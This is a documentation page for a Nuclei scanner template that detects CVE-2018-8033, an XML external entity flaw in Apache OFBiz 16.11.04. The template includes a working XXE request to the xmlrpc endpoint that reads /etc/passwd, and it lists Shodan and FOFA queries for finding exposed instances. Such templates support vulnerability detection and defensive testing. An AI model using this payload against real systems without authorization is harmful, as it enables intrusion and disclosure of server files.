Skip to content
Nuclei Templates

Apache OFBiz 16.11.04 - XML Entity Injection

ID: CVE-2018-8033

Severity: high

Author: pikpikcu

Tags: cve,cve2018,apache,ofbiz,xxe

Description

Section titled “Description”

Apache OFBiz 16.11.04 is susceptible to XML external entity injection (XXE injection).

YAML Source

Section titled “YAML Source”
id: CVE-2018-8033


info:
  name: Apache OFBiz 16.11.04 - XML Entity Injection
  author: pikpikcu
  severity: high
  description: |
    Apache OFBiz 16.11.04 is susceptible to XML external entity injection (XXE injection).
  impact: |
    Successful exploitation of this vulnerability could lead to information disclosure, denial of service.
  remediation: |
    Apply the necessary patches or upgrade to a non-vulnerable version of Apache OFBiz.
  reference:
    - https://lists.apache.org/thread.html/e8fb551e86e901932081f81ee9985bb72052b4d412f23d89b1282777@%3Cuser.ofbiz.apache.org%3E
    - https://nvd.nist.gov/vuln/detail/CVE-2018-8033
    - https://lists.apache.org/thread.html/e8fb551e86e901932081f81ee9985bb72052b4d412f23d89b1282777%40%3Cuser.ofbiz.apache.org%3E
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2018-8033
    cwe-id: CWE-200
    epss-score: 0.04526
    epss-percentile: 0.92473
    cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: apache
    product: ofbiz
    shodan-query:
      - http.html:"ofbiz"
      - ofbiz.visitor=
    fofa-query:
      - body="ofbiz"
      - app="apache_ofbiz"
  tags: cve,cve2018,apache,ofbiz,xxe


http:
  - raw:
      - |
        POST /webtools/control/xmlrpc HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Accept-Language: en
        Content-Type: application/xml


        <?xml version="1.0"?><!DOCTYPE x [<!ENTITY disclose SYSTEM "file://///etc/passwd">]><methodCall><methodName>&disclose;</methodName></methodCall>


    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"


      - type: status
        status:
          - 200
# digest: 490a00463044022057fecd0488493d402fd6ebaacbda569e9a215224c28ce2e050f6f803675af2b102204129a23dd77eee0b8734c671698364b3e535c8c5567ae6cba4eb4fee59c25e87:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2018/CVE-2018-8033.yaml"

View on Github